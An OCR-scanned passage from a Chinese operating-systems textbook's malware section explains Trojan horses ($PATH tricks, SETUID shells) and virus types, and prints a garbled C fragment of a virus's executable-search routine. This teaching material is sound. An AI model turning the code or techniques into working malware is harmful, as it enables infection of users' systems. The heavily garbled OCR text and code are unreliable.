在 闪存 中 ， 闪 存 可 以 在 程序 的 控制 下 被 重 写 (以 便 生 产 者 可 以 方便 地 修正 其 错误 ) 。 恶 意 软件 向 闪存 中 随 
机 地 写 和 垃圾 数据 ， 使 得 电脑 无 法 启动 。 如 果 闪 存在 电脑 插 槽 中 ， 那 么 修复 这 个 问题 需要 将 电脑 打开 ， 
并 且 换 一 个 新 的 闪存 ， 如 果 闪 存 被 焊接 在 母 板 上 ， 可 能 整 块 母 板 都 可 能 作废 ， 不 得 不 买 一 块 新 的 母 板 。 

我 们 不 打算 继续 深入 地 讨论 这 个 问题 ， 读 者 到 这 里 已 经 了 解 关于 恶意 软件 的 基本 情况 ， 如 果 想 了 解 
更 多 内 容 ， 请 在 搜索 引擎 中 输入 “恶意 软件 "。 

很 多 人 会 问 :“ 为 什么 恶意 软件 会 如 此 容易 地 传播 开 来 ? ”产生 这 种 情况 的 原因 有 很 多 。 其 中 之 一 
是 世界 上 90% 的 计算 机 运行 的 是 单一 版 本 的 操作 系统 (Windows)， 使 得 它 成 为 一 个 非常 容易 被 攻击 的 目 
标 。 假 设 每 台 计 算 机 都 有 10 个 操作 系统 ， 其 中 每 个 操作 系统 占有 市 场 的 10% ， 那 么 传播 恶意 代码 就 会 变 
得 加 倍 的 困难 。 这 就 好 比 在 生物 世界 中 ， 物 种 多 样 化 可 以 有 效 防止 生物 灭绝 。 

第 二 个 原因 是 ， 微 软 在 很 早 以 前 就 强调 其 Windows 操 作 系统 对 于 没有 计算 机 专业 知识 的 人 而 言 是 简 
单 易 用 的 。 例 如 Windows 允 许 设置 在 没有 密码 的 情况 下 登录 ， 而 UNIX 从 诞生 之 初 就 始终 要 求 登录 密码 
(尽管 随 着 Linux 不 断 试 图 向 Windows 靠 近 ， 这 种 传统 正在 逐步 地 淡化 ) ， 操 作 系统 易 用 性 是 微软 一 贯 坚 
持 的 市 场 策略 ， 因 此 他 们 在 安全 性 与 易 用 性 之 间 不 断 进行 着 权衡 。 如 果 读 者 认为 安全 性 更 加 重要 ， 那 么 
请 先 停止 阅读 ， 在 用 你 的 手机 打 电话 之 前 先 为 它 注册 一 个 PIN 码 一 一 几乎 所 有 的 手机 都 有 此 功能 。 如 果 
你 不 知道 如 何 去 做 ， 那 么 请 从 生产 商 的 网 站 下 载 用 户 手册 。 

在 下 面 的 几 节 中 我 们 将 会 看 到 恶意 软件 更 为 一 般 化 的 形式 ， 读 者 将 会 看 到 这 些 软件 是 如 何 组 织 并 传 
播 的 。 之 后 我 们 会 提供 对 恶意 软件 的 一 些 防 御 方法 。 


9.7.1 特洛伊 木马 

编写 恶意 代码 是 第 一 步 ， 你 可 以 在 你 的 卧室 里 完成 这 件 事情 。 然 而 让 数 以 百 万 计 的 人 将 你 的 程序 安 
装 到 他 们 的 电脑 中 则 是 完全 不 同 的 另 一 件 事 。 我 们 的 软件 编写 者 Mal 该 如 何 做 呢 ? 一 般 的 方法 是 编写 一 
些 有 用 的 程序 ， 并 将 恶意 代码 嵌入 到 其 中 。 游戏、 音乐 播放 器 、 色 情书 刊 阅览 器 等 都 是 比较 好 的 选择 。 
人 们 会 自愿 地 下 载 并 安装 这 些 应 用 程序 。 作 为 安装 免费 软件 的 代价 ， 他 们 也 同时 安装 了 恶意 软件 。 这 种 
方式 叫做 木马 攻击 (Torjan horse attack) ， 引 自 希 腊 荷 马 所 做 《奥德赛 》 中 装 满 了 希腊 士兵 的 木马 。 在 
计算 机 安全 世界 中 ， 它 指 人 们 自愿 下 载 的 软件 中 所 隐藏 的 恶意 软件 。 

当 用 户 下 载 的 程序 运行 时 ， 它 调用 函数 将 恶意 代码 写 入 磁盘 成 为 可 执行 程序 并 启动 该 程序 。 恶 意 代 
码 接 下 来 便 可 以 进行 任何 预先 设计 好 的 破坏 活动 ， 如 删除 、 修 改 或 加 密 文 件 。 它 还 可 以 搜索 信用 卡号 、 
密码 和 其 他 有 用 的 信息 ， 并 且 通 过 互联 网 发 送 给 Mal。 该 恶意 代码 很 有 可 能 连接 到 某 些 IP 端 口上 以 监听 远 
程 命令 ， 将 该 计算 机 变 成 优 尸 机 器 ， 随 时 准备 发 送 垃圾 邮件 或 完成 攻击 者 的 指示 。 通 常情 况 下 ， 恶 意 代 
码 还 包括 一 些 指令 ， 使 得 它 在 计算 机 每 次 重新 启动 的 时 候 自动 启动 ， 这 一 点 所 有 的 操作 系统 都 可 以 做 到 。 

木马 攻击 的 美妙 之 处 在 于 ， 木 马 的 拥有 者 不 必 自 己 费 尽心 机 侵入 到 受害 者 的 计算 机 中 ， 因 为 木马 是 
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由 受害 者 自己 安装 的 。 

还 有 许多 其 他 方法 引诱 受害 人 执行 特洛伊 木马 程序 。 如 ， 许 多 UNIX 用 户 都 有 一 个 环境 变量 $PATH ， 
这 是 一 个 控制 查找 哪些 目录 的 命令 。 在 shell 程 序 中 键入 

echo $PATH 
就 可 以 查看 。 

例如 ， 用 户 ast 在 系统 上 设置 的 环境 变量 可 能 会 包括 以 下 目录 : 

:/usr/ast/bin:/usr/local/bin:/usr/bin:/bin:/usr/bin/X 11:/usr/ucb:/usr/man\ 

:/usr/java/bin:/usr/java/lib:/usr/local/man:/usr/openwin/man 

其 他 用 户 可 能 设置 不 同 的 查找 路 径 。 当 用 户 在 shell 中 键 人 

prog 
后 ，shell 会 查看 在 目录 /usr/ast/bin/prog 下 是 否 有 程序 。 如 果 有 就 执行 ， 如 果 没 有 ，shell 会 尝试 查找 
Wusr/local/bin/prog 、/usr/bin/prog、/bin/prog， 直 到 查 遍 所 有 10 个 目录 为 止 。 假 定 这 些 目录 中 有 一 个 目录 
未 被 保护 ， 骇 客 即 可 以 在 该 目录 下 放 一 个 程序 。 如 果 在 整个 目录 列表 中 ， 该 程序 是 第 一 次 出 现 ， 就 会 被 
运行 ， 从 而 特洛伊 木马 也 被 执行 。 

大 多 数 常 用 的 程序 都 在 /bin 或 /usr/bin 中 ， 因 此 在 /usr/bin/X11/s 中 放 一 个 木马 对 一 般 的 程序 而 言 不 会 
起 作用 。 因 为 真 的 版 本 会 先 被 找到 。 但 是 假设 骇 客 在 /usr/bin/X11 中 插入 了 la， 如 果 用 户 误 键入 la 而 不 是 
is ( 列 目 录 命 令 )， 那 么 特洛伊 木马 程序 就 会 运行 并 执行 其 功能 ， 随 后 显示 la 并 不 存在 的 正确 信息 以 迷惑 
用 户 。 通 过 在 复杂 的 目录 系统 中 插入 特洛伊 木马 程序 并 用 人 们 易 拼 错 的 单词 作为 名 字 ， 用 户 迟 早 会 有 机 
会 误 操作 并 激活 特洛伊 森马。 有些 人 可 能 会 是 超级 用 户 (超级 用 户 也 会 误 操作 ) ， 于 是 特洛伊 森马 会 有 
机 会 把 /bin/ls 赫 换 成 含有 特洛伊 木马 的 程序 ， 这 样 就 能 在 任何 时 候 被 激活 。 

Mal， 一 个 恶意 的 但 合法 的 用 户 ， 也 可 能 为 超级 用 户 放置 陷阱 。 他 用 含有 特洛伊 木马 程序 的 1s 命 令 
更 换 了 原 有 的 版 本 ， 然 后 假装 做 一 些 秘密 的 操作 以 引起 超级 用 户 的 注意 ， 如 同时 打开 100 个 计算 约束 进 
程 。 当 超级 用 户 键入 下 列 命令 来 查看 Mal 的 目录 时 机 会 就 来 了 : 

cd /home /mal 

is-1 

既然 某 些 shell 程 序 在 通过 $PATH 工 作 之 前 会 首先 确定 当前 所 在 的 目录 ， 那 么 超级 用 户 可 能 会 刚刚 激 
活 Mal 放 置 的 特洛伊 木马 。 特 洛 伊 木马 可 以 把 /usr/mal/bin/sh 的 SETUID 设 为 root。 接 着 它 执行 两 个 操作 ， 
用 chown 把 /usr/mal/bin/sh 的 owner 改 为 root，, 然 后 用 chmod 设 置 SETUID 位 。 现 在 Mal 仅 仅 通 过 运行 shell 
就 可 以 成 为 超级 用 户 了 。 

如 果 Mal 发 现 自己 缺 钱 ， 他 可 能 会 使 用 下 面 的 特洛伊 木马 来 找 钱 花 。 第 一 个 方法 是 ,特洛伊 木马 程 
序 安装 诸如 Quicken 之 类 的 软件 检查 受害 人 是 否 有 银行 联机 程序 ， 如 果 有 就 直接 把 受害 人 账户 里 的 钱 转 
到 一 个 用 于 存 钱 的 虚拟 账户 (特别 是 国外 账户 ) 里 。 

第 二 个 方法 是 ， 特 洛 伊 木马 首先 关闭 modem 的 声音 ， 然 后 拨打 900 号 码 (支付 号 码 ) 到 偏远 国家 ， 
如 摩尔 多 瓦 (前 苏联 的 一 部 分 )。 如 果 特洛伊 木马 运行 时 用 户 在 线 ， 那 么 摩尔 多 瓦 的 900 号 码 就 成 为 该 用 
户 的 Internet 接 入 提供 者 (非常 昂贵 )， 这 样 用 户 就 不 会 发 觉 并 在 网 上 待 上 好 几 个 小 时 。 上 述 两 种 方法 都 
不 仅仅 是 假设 : 它们 都 曾 发 生 并 被 Denning (1999) 报道 过 。 关 于 后 一 种 方法 ， 曾 经 有 800 000 分 钟 连接 
到 摩尔 多 瓦 ， 直 到 美国 联邦 交易 局 断 开 连接 并 起 诉 位 于 长 岛 的 三 个 人 。 他 们 最 后 同意 归还 38 000 个 受害 
者 的 274 万 美元 。 


9.7.2 病毒 

打开 报纸 ， 总 是 能 够 看 到 关于 病毒 或 蠕虫 攻击 计算 机 的 新 闻 。 它 们 显然 已 经 成 为 现今 影响 个 人 和 公 
司 安 全 的 主要 问题 。 本 节 我 们 将 介绍 病毒 ， 接 下 来 将 介绍 蠕虫 。 

笔者 在 撰写 本 节 时 曾 犹 了 要 不 要 给 出 太 多 的 细节 ， 担 心 它们 会 让 一 些 人 产生 邪 仿 。 然 而 现在 有 很 多 
书籍 提供 了 更 为 详细 的 内 容 ， 有 些 其 至 给 出 代码 Ludwig, 1998)。 而 且 互 联网 上 也 有 很 多 病毒 方面 的 信 
息 ， 笔 者 写 出 的 这 些 并 不 足以 构成 什么 威胁 。 另 外 ， 和 人们 在 不 知道 病毒 工作 原理 的 情况 下 很 难 去 防御 它 
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们 ， 而 且 关于 病毒 的 传播 有 许多 错误 的 观念 需要 纠正 。 

那么 ， 什 么 是 病毒 呢 ? KER, AA (virus) 是 一 种 特殊 的 程序 ， 它 可 以 通过 把 自己 植 和 到 其 他 
程序 中 来 进行 “繁殖 "， 就 像 生物 界 中 真正 的 病毒 那样 。 除 了 繁殖 自身 以 外 ， 病 毒 还 可 以 做 许多 其 他 的 
事情 。 蠕 虫 很 像 病 毒 ， 但 其 不 同 点 是 通过 自己 复制 自己 来 繁殖 。 不 过 这 不 是 我 们 关注 的 重点 ， 因 此 下 面 
我 们 将 用 “病毒 ”来 统称 上 面 两 种 恶意 程序 。 有 关 蠕虫 的 内 容 会 在 9.7.3 节 中 讲解 。 

1. 病毒 工作 原理 

让 我 们 看 一 下 病毒 有 那些 种 类 以 及 它们 是 如 何 工作 的 。 病 毒 的 制造 者 ， 我 们 称 之 为 Virgil， 可 能 用 
汇编 语言 (或 者 C 语 言 ) 写 了 一 段 很 小 但 是 有 效 的 病毒 。 在 他 完成 这 个 病毒 之 后 ， 他 利用 一 个 叫做 
dropper 的 工具 把 病毒 插入 到 自己 计算 机 的 程序 里 ， 然 后 让 被 感染 的 程序 迅速 传播 。 也 许 贴 在 公告 板 上 ， 
也 许 作为 免费 软件 共享 在 Internet 上 。 这 一 程序 可 能 是 一 款 激动 人 心 的 游戏 ， 一 个 盗版 的 商业 软件 或 其 他 
能 引信 注 意 的 软件 。 随 后 人 们 就 开始 下 载 这 一 病毒 程序 。 

一 旦 病毒 程序 被 安装 到 受害 者 的 计算 机 里 ,病毒 就 处 于 休眠 状态 直到 被 感染 的 程序 被 执行 。 发 作 时 ， 
它 感染 其 他 程序 并 执行 自己 的 操作 。 通 常 ， 在 某 个 特定 日 期 之 前 病毒 是 不 执行 任何 操作 的 ， 直 到 某 一 天 
它 认为 自己 在 被 关注 前 已 被 广泛 传播 时 才 发 作 。 被 选中 的 日 期 可 能 是 发 送 一 段 政治 信息 (如 在 病毒 编写 
者 所 在 的 宗教 田 体 受 雄 的 100 周 年 或 500 周 年 纪念 日 触发 )。 

在 下 面 的 讨论 中 ， 我 们 来 看 一 下 感染 不 同文 件 的 七 种 病毒 。 他 们 是 共事 者 、 可 执行 程序 、 内 存 、 引 
导 扁 区、 驱动 器 、 宏 以 及 源 代码 病毒 。 毫 无 疑问 ， 新 的 病毒 类 型 不 久 就 会 出 现 。 

2. 共事 者 病毒 

ЭЖА А 4 (companion virus) 并 不 真正 感染 程序 ， 但 当 程序 执行 的 时 候 它 也 执行 。 下 面 的 例子 很 
容易 解释 这 个 概念 。 在 MS-DOS 中 ， 当 用 户 输入 

prog 
MS-DOS 首 先 查 找 叫做 prog.com 的 程序 。 如 果 没 有 找到 就 查找 叫做 prog.exe 的 程序 。 在 Windows 里 ， 当 用 
户 点 击 Start (开始 ) 和 Run (运行 ) 后 ， 同 样 的 结果 会 发 生 。 现在 大 多 数 的 程序 都 是 ,exe 文件 ，.com 文 
件 几 乎 很 少 了 。 

假设 Virgil 知 道 许多 人 都 在 MS-DOS 提 示 符 下 或 点 击 Windows 的 Run 运 行 prog.exe。 他 就 能 简单 地 制 
造 一 个 叫做 prog.com 的 病毒 ， 当 人 们 试图 运行 prog (除非 输入 的 是 全 名 prog.exe) 时 就 可 以 让 病毒 执行 。 
当 prog.com 完 成 了 工作 ， 病 毒 就 让 prog.exe 开 始 运行 而 用 户 显然 没有 这 么 聪明 。 

有 时 候 类 似 的 攻击 也 发 生 在 Windows 操 作 系统 的 桌面 上 ,桌面 上 有 连接 到 程序 的 快捷 方式 (符号 链 
接 )。 病 毒 能 够 改变 链接 的 目标 ， 并 指向 病毒 本 身 。 当 用 户 双 击 图 标 时 ， 病 毒 就 会 运行 。 运 行 完毕 后 ， 
病毒 又 会 启动 正常 的 目标 程序 。 

3. 可 执行 程序 病毒 

更 复杂 的 一 类 病毒 是 感染 可 执行 程序 的 病毒 。 它 们 中 最 简单 的 一 类 会 覆盖 可 执行 程序 ， 这 叫做 丽 盖 
AA (overwriting virus) 。 它 们 的 感染 机 制 如 图 9-27 所 示 。 

病毒 的 主 程序 首先 将 自己 的 二 进 制 代码 复制 到 数组 里 ， 这 是 通过 打开 argv[0] 并 将 其 读 取 以 便 安全 调 
用 来 完成 的 。 然 后 它 通过 将 自己 变 为 根 目录 来 截断 由 原来 的 根 目录 开始 的 整个 文件 系统 ， 将 根 目录 作为 
参数 调用 search 过 程 。 

递归 过 程 search 打 开 一 个 目录 ， 每 次 使 用 readdir 命 令 逐 一 读 取 入 口 地址， 直到 返回 值 为 NULL， 说 
明 所 有 的 入 口 都 被 读 取 过 。 如 果 入 口 是 目 录 ， 就 将 当前 目录 改 为 该 有 目录， 继续 递归 调用 search，; 如 果 入 
口 是 可 执行 文件 ， 就 调用 infect 过 程 来 感染 文件 ， 这 时 把 要 感染 的 文件 名 作为 参数 。 以 “.” 开头 的 文件 
被 跳 过 以 避免 “.” 和 “,.” 目 录 带 来 的 问题 。 同 时 符号 链接 也 被 跳 过 ， 因为 系统 可 以 通过 chdir 系 统 调用 
进入 目录 并 通过 转 到 “..” 来 返回 ， 这 种 对 硬 连 接 成 立 ， 对 符号 链接 不 成 立 。 更 完善 的 程序 同样 可 以 处 
理 符号 链接 。 

真正 的 感染 程序 infect (尚未 介绍 ) 仅仅 打开 在 其 参数 中 指定 的 文件 并 把 数组 里 存放 的 病毒 代码 复 
制 到 文件 里 ， 然 后 再 关闭 文件 。 
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#include <sys/types.h> /标准 的 POSIX 头 文件 */ 
#include <sys/stat.h> 

#include <dirent.h> 

#include <fcntlh> 

#include <unistd.h> 


struct stat sbuf; /用 于 stat 调 用 ， 看 文件 是 否 为 sym 连 接 */ 

search(char *dir_name) 

{ 可 执行 表 的 递归 查找 */ 
DIR *dirp; /* 指 向 打开 目录 流 的 指针 */ 
struct dirent «ар; /指向 目录 项 的 指针 ?*/ 
dirp = opendir(dir_name); A* 打 开 此 目录 */ 
if (dirp та retum; /* ЖЕТЖ Н REHE +7 
pe ПА а: 个 读 下 一 个 月 录 项 */ 

БЕТҮ /ANULL 表 示 已 完成 操作 */ 
chdir (*..*); PARAR 
break; Ра 


} 


if (dp->d_nameft kit e a n” ARY 

Istat(dp->d_name, &sbuf); /* 项 是 符号 连接 吗 ? */ 

if (S_ISLNK(sbuf.st _mode)) continue; /* 跳 过 符号 连接 */ 

й (chdir(dp->d.name) == 0) { /* 如 果 chdir 成 功 ， 则 必定 是 目录 */ 
ѕеагоћ("."); ГУЕ, HARREM 

} else{ BE (文件 )， 则 感染 */ 


И (access(dp->d_name,X_ OK) == 0) з, 
nfect( Gp sd пато); 广 如 是 可 执行 文件 就 感 架 */ 


a dir 运行 完毕 ， 关 闭 程序 并 返回 */ 


图 9-27 在 UNIX 系 统 上 查找 可 执行 文件 的 递归 过 程 


病毒 可 以 通过 很 多 种 方法 不 断 “ 改 善 "。 第 一 ， 可 以 在 infect 里 插入 产生 随机 数 的 测试 程序 然后 悄然 
返回 。 如 调用 超过 了 128 次 病毒 就 会 感染 ， 这 样 就 降低 了 病毒 在 大 范围 传播 之 前 就 被 被 检测 出 来 的 概率 。 
生物 病毒 也 具有 这 样 的 特性 : 那些 能 够 迅速 杀 死 受 害 者 的 病毒 不 如 缓慢 发 作 的 病毒 传播 得 快 ， 慢 发 作 给 
了 病毒 以 更 多 的 机 会 扩散 。 另 外 一 个 方法 是 保持 较 高 的 感染 率 (如 25%)， 但 是 一 次 大 量 感染 文件 会 降 
低 磁盘 性 能 ， 从 而 易于 被 发 现 。 

第 二 ，infect 可 以 检查 文件 是 否 已 被 感染 。 两 次 感染 相同 的 文件 无 疑 是 浪费 时 间 。 第 三 ， 可 以 采取 
方法 保持 文件 的 修改 时 间 及 文件 大 小 不 变 , 这 样 可 以 协助 把 病毒 代码 隐藏 起 来 。 对 大 于 病毒 的 程序 来 说 ， 
感染 后 程序 大 小 将 保持 不 便 ， 但 对 小 于 病毒 大 小 的 程序 来 说 ， 感 染 后 程序 将 变 大 。 多 数 病毒 都 比 大 多 数 
程序 小 ， 所 以 这 不 是 一 个 严重 的 问题 。 

一 般 的 病毒 程序 并 不 长 (整个 程序 用 C 语 言 编写 不 超过 1 页 ， 文 本 段 编译 后 小 于 2KB) ， 汇 编 语言 纺 
写 的 版 本 将 更 小 。Ludwig (1998) 曾经 给 出 了 一 个 感染 目录 里 所 有 文件 的 MS-DOS 病 毒 ， 用 汇编 语言 
写 并 编译 后 仅 有 44 个 字 节 。 

稍 后 的 章节 将 研究 反 病毒 程序 ， 这 种 反 病毒 程序 可 以 跟踪 病毒 并 除去 它们 。 而 且 ， 在 图 9-27 里 很 有 趣 
的 情况 是 ， 病 毒 用 来 查找 可 执行 文件 的 方法 也 可 以 被 反 病毒 程序 用 来 跟踪 被 感染 的 文件 并 最 终 清除 病毒 。 
感染 机 制 与 反感 染 机 制 是 相辅相成 的 ， 所 以 为 了 更 有 效 地 打击 病毒 ， 我 们 必须 详细 理解 病毒 工作 的 原理 。 

从 Virgil 的 观点 来 说 ， 病 毒 的 致命 问题 在 于 它 太 容易 被 发 现 了 。 毕 竟 当 被 感染 的 程序 运行 时 ， 病 毒 就 会 
感染 更 多 的 文件 ， 但 这 时 该 程序 就 并 不 能 正常 运行 那么 用 户 就 会 立即 发 现 。 所 以 ， 有 相当 多 的 病毒 把 自 
已 附 在 正常 程序 里 ， 在 病毒 发 作 时 可 以 让 原来 的 程序 正常 工作 。 这 类 病毒 叫做 寄生 病毒 (parasitic virus), 

寄生 病毒 可 以 附 在 可 执行 文件 的 前 端 、 后 端 或 者 中 间 。 如 果 附 在 前 端 ， 病 毒 首先 要 把 程序 复制 到 
RAM 中 ， 把 自己 附加 到 程序 前 端 ， 然 后 再 从 RAM 里 复制 回来 ， 整 个 过 程 如 图 9-28b 所 示 。 造 憾 的 是 ， 这 
时 的 程序 不 会 在 新 的 虚拟 地 址 里 运行 ， 所 以 病毒 要 么 在 程序 被 移动 后 重新 为 该 程序 分 配 地 址 ， 要 么 在 完 
成 自己 的 操作 后 缩 回 到 虚拟 地 址 0。 
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可 执行 
程序 


起 始 地 址 


а) b) 
图 9-28 а) 一 段 可 执行 程序 ，b) 病毒 在 前 端 ，c) 病毒 在 后 端 ，d) 病毒 充斥 在 程序 里 的 多 余 空间 里 


为 了 避免 从 前 端 装 入 病毒 代码 带 来 的 复杂 操作 ， 大 多 数 病毒 是 后 端 装 入 的 ， 把 它们 自己 附 在 可 执行 
程序 末端 而 不 是 前 端 ， 并 且 把 文件 头 的 起 始 地 址 指向 病毒 ， 如 图 9-28c 所 示 。 现 在 病毒 要 根据 被 感染 程 
序 的 不 同 在 不 同 的 虚拟 地 址 上 运行 ， 这 意味 着 Virgil 必 须 使 用 相对 地 址 ， 而 不 是 绝对 地 址 来 保证 病毒 是 
位 置 独 立 的 。 对 资深 的 程序 员 来 说 ， 这 样 做 并 不 难 ， 并 且 一 些 编译 器 根据 需要 也 可 以 完成 这 件 事 。 

复杂 的 可 执行 程序 格式 ， 如 Windows 里 的 ,exe 文件 和 UNIX 系 统 中 几乎 所 有 的 二 进 制 格式 文件 都 拥有 
多 个 文本 和 数据 段 ， 可 以 用 装载 程序 在 内 存 中 迅速 把 这 些 段 组 装 和 分 配 。 在 有 些 系 统 中 (如 Windows)， 
所 有 的 段 都 包含 多 个 512 字 节 单元 。 如 果 某 个 段 不 满 ， 链 接 程序 会 用 0 填充 。 知 道 这 一 点 的 病毒 会 试图 隐 
城 在 这 些 空洞 里 。 如 果 正 好 填 满 多 余 的 空间 ， 如 图 9-28d 所 示 ， 整 个 文件 大 小 将 和 未 感染 的 文件 一 样 保 
HRE, 不 过 却 有 了 一 个 附加 物 ， 所 以 隐 含 的 病毒 是 幸运 的 病毒 。 这 类 病毒 叫做 空 腔 病毒 (cavity virus), 
当然 如 果 装 载 程序 不 把 多 余部 分 装 入 内存， 病毒 也 会 另 砚 途径 。 

4. 内 存 驻 留 病毒 

到 目前 为 止 ， 我 们 假设 当 被 感染 的 程序 运行 时 ， 病 毒 也 同时 运行 ， 然 后 将 控制 权 交 给 真正 的 程序 ， 
最 后 退出 。 内 存 驻 留 病毒 (memory-resident virus) 与 此 相反 ， 它 们 总 是 驻 留 在 内 存 中 (RAM)， 要 么 茂 
在 内 存 上 端 ， 要 么 藏 在 下 端的 中 断 变量 中 。 聪 明 的 病毒 甚至 可 以 改变 操作 系统 的 RAM 分 布 位 图 ， 让 系 
统 以 为 病毒 所 在 的 区 域 已 经 占用 ， 从 而 避免 了 被 其 他 程序 种 盖 。 

典型 的 内 存 驻 留 病毒 通过 把 陷阱 或 中 断 向 量 中 的 内 容 复制 到 任意 变量 中 之 后 ， 将 自身 的 地 址 放置 其 
中 ， 俘 获 陷阱 或 中 断 向 量 ， 从 而 将 该 陷阱 或 中 断 指向 病毒 。 最 好 的 选择 是 系统 调用 陷阱 ， 这 样 病毒 就 可 
以 在 每 一 次 系统 调用 时 运行 〈 在 核心 态 下 ) 。 病 毒 运行 完 之 后 ， 通 过 跳 转 到 所 保存 的 陷阱 地 址 重新 激活 
真正 的 系统 调用 。 

为 什么 病毒 在 每 次 系统 调用 时 都 要 运行 呢 ? 这 是 因为 病毒 想 感染 程序 。 病 毒 可 以 等 待 直到 发 现 一 个 
exec 系 统 调用 ， 从 而 判断 这 是 一 个 可 执行 二 进 制 (而 且 也 许 是 一 个 有 价值 的 ) 代码 文件 ， 于 是 决定 感染 
它 。 这 一 过 程 并 不 需要 大 量 的 磁盘 活动 ， 如 图 9-27 所 示 ， 所 以 难以 被 发 现 。 捕 捉 所 有 的 系统 调用 也 给 了 
病毒 潜在 的 能 力 ， 可 以 监视 所 有 的 数据 并 造成 种 种 危害 。 

5. 引导 扁 区 病毒 
正如 我 们 在 第 5 章 所 讨论 的 ， 当 大 多 数 计算 机 开机 时 ，BIOS 读 引导 磁盘 的 主 引导 记录 放 入 RAM 中 并 
了 。 引 导 程序 判断 出 哪 一 个 是 活动 分 区 ， 从 该 分 区 读 取 第 一 个 扇 区， 即 引 导 扁 区 ， 并 运行 。 随 后 ， 系 
统 要 么 装 人 操作 系统 要 么 通过 装载 程序 导入 操作 系统 。 但 是 ， 多 年 以 前 Virgil 的 朋友 发 现 可 以 制作 一 种 
病毒 覆盖 主 引导 记录 或 引导 扁 区 ， 并 能 造成 灾难 性 的 后 果 。 这 种 叫做 引导 扁 区 病毒 (boot sector virus), 
它们 现在 已 十 分 普遍 了 。 

通常 引导 启 区 病毒 [包括 MBR ( 主 引导 记录 ) 病毒 ] ， 首 先 把 真正 的 引导 记录 扇 区 复制 到 磁盘 的 安 
全 区 域 ， 这 样 就 能 在 完成 操作 后 正常 引导 操作 系统 。Microsoft 的 磁盘 格式 化 工具 fdisk 往 往 跳 过 第 一 个 磁 
道 ， 所 以 这 是 在 Windows 机 器 中 隐藏 引导 记录 的 好 地 方 。 另 一 个 办 法 是 使 用 磁盘 内 任意 空闲 的 扁 区 ， 然 
后 更 新 坏 扇 区 列表 ， 把 隐藏 引导 记录 的 扁 区 标记 为 坏 访 区 。 实 际 上 ， 由 于 病毒 相当 庞大 ， 所 以 它 也 可 以 
把 自身 剩余 的 部 分 伪装 成 坏 遍 区 。 如 果 根 目录 有 足够 大 的 固定 空间 ， 如 在 Windows 98 中 ， 根 目录 的 末端 
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也 是 一 个 隐藏 病毒 的 好 地 方 。 真 正 有 攻击 性 的 病毒 甚至 可 以 为 引导 记录 遍 区 和 自身 重新 分 配 磁 盘 空 间 ， 
并 相应 地 更 新 磁盘 分 布 位 图 或 空 亲 表 。 这 需要 对 操作 系统 的 内 部 数据 结构 有 详细 的 了 解 ， 不 过 Virgil 有 
-个 很 好 的 教授 专门 讲解 和 研究 操作 系统 。 

当 计算 机 启动 时 ， 病 毒 把 自身 复制 到 RAM 中 ， 要 么 隐藏 在 顶部 ， 要 么 在 未 使 用 的 中 断 向 量 中 。 由 
于 此 时 计算 机 处 于 核心 态 ，MMU 处 于 关闭 状态 ， 没 有 操作 系统 和 反 病 毒 程序 在 运行 ， 所 以 这 对 病毒 来 
说 是 天 赐 良 机 。 当 一 切 准备 就 绪 时 ， 病 毒 会 启动 操作 系统 ， 而 自己 则 往往 驻 留 在 内 存 里 ， 所 以 它 能 够 监 
视 情况 变化 。 

然而 ， 存 在 一 个 如 何 获取 今后 对 系统 的 控制 权 的 问题 。 常 用 的 办 法 要 利用 一 些 操作 系统 管理 中 断 向 
量 的 技巧 。 如 Windows 系 统 在 一 次 中 断后 并 不 重 置 所 有 的 中 断 向 量 。 相 反 ， 系 统 每 次 装 入 一 个 设备 驱动 
程序 ， 每 一 个 都 获取 所 需 的 中 断 向 量 。 这 一 过 程 要 持续 一 分 钟 左 右 。 

这 种 设计 给 了 病毒 以 可 乘 之 机 。 它 可 以 捕获 所 有 中 断 向 量 ， 如 图 9-29a 所 示 。 当 加 载 驱动 程序 时 ， 
部 分 向 量 被 覆盖 ， 但 是 除非 时 钟 驱动 程序 首先 被 载 入 ， 否 则 会 有 大 量 的 时 钟 中 断 用 来 激活 病毒 。 丢 失 了 
打印 机 中 断 的 情况 如 图 9-29b 所 示 。 只 要 病毒 发 现 有 某 一 个 中 断 向 量 已 被 覆盖 ， 它 就 再 次 覆盖 该 向 量 ， 
因为 这 样 做 是 安全 的 (实际 上 ， 有 些 中 断 向 量 在 启动 时 被 覆盖 了 好 几 次 ，Virgil 很 明白 是 怎么 回 事 )。 重 
新 夺回 打印 机 控制 权 的 示意 图 如 图 9-29c 所 示 。 在 所 有 的 一 切 都 加 载 完毕 后 ， 病 毒 恢 复 所 有 的 中 断 向 量 ， 
而 仅仅 为 自己 保留 了 系统 调用 陷阱 向 最。 至此， 内 存 驻 留 病毒 控制 了 系统 调用 。 事 实 上 ， 大 多 数 内 存 驻 
留 病毒 就 是 这 样 开始 运行 的 。 


图 9-29 а) 病毒 捕获 了 所 有 的 中 断 向 量 和 陷阱 向 量 后 ，b) 操作 系统 夺回 了 打印 机 中 断 向 量 ， 
©) 病毒 意识 到 打印 机 向 量 的 丢失 并 重新 夺回 了 控制 权 


б. 设备 驱动 病毒 

深入 内 存 有 点 像 洞穴 探险 一 一 你 不 得 不 握 曲 身体 前 进 并 时 刻 担心 物体 磺 落 在 头 上 。 如 果 操 作 系 统 能 
够 友好 并 光明 正大 地 装 人 病毒 ， 那 么 事情 就 好 办 多 了 。 其 实 只 要 那么 一 点 点 努力 ， 就 可 以 达到 这 一 目标 。 
解决 办 法 是 感染 设备 驱动 程序 ， 这 类 病毒 叫做 设备 驱动 病毒 (device driver virus) 。 在 Windows 和 有 些 
UNIX 系 统 中 ， 设 备 驱 动 程序 是 位 于 磁盘 里 或 在 启动 时 被 加 载 的 可 执行 程序 。 如 果 有 一 个 驱动 程序 被 寄生 
病毒 感染 ， 病 毒 就 能 够 在 每 次 启动 时 被 正大 光明 地 载 入 。 而 且 ， 当 驱动 程序 运行 在 核心 态 下 
就 会 调用 病毒 ， 从 而 给 病毒 获取 系统 调用 的 陷阱 向 量 的 机 会 。 这 样 的 情况 促使 我 们 限制 驱动 程序 
户 态 ， 这 样 的 话 即使 驱动 程序 被 病毒 感染 ， 它 们 也 不 能 像 在 内 核 态 的 驱动 程序 一 样 ， 造 成 很 大 的 危害 。 

7. 宏 病毒 

许多 应 用 程序 ， 如 Word 和 Excel， 人 允许 用 户 把 一 大 串 命令 写 人 宏文 件 ， 以 便 日 后 一 次 按键 就 能 够 执 
行 。 宏 可 附 在 菜单 项 里 ， 这 样 当 菜 单项 被 选中 时 宏 就 可 以 运行 。 在 Microsoft Office 中 ， 宏 可 以 包含 完全 
用 Visual Basic 编 程 语言 编写 的 程序 。 宏 程序 是 解释 执行 而 不 是 编译 执行 的 ， 但 解释 执行 只 影响 运行 速度 
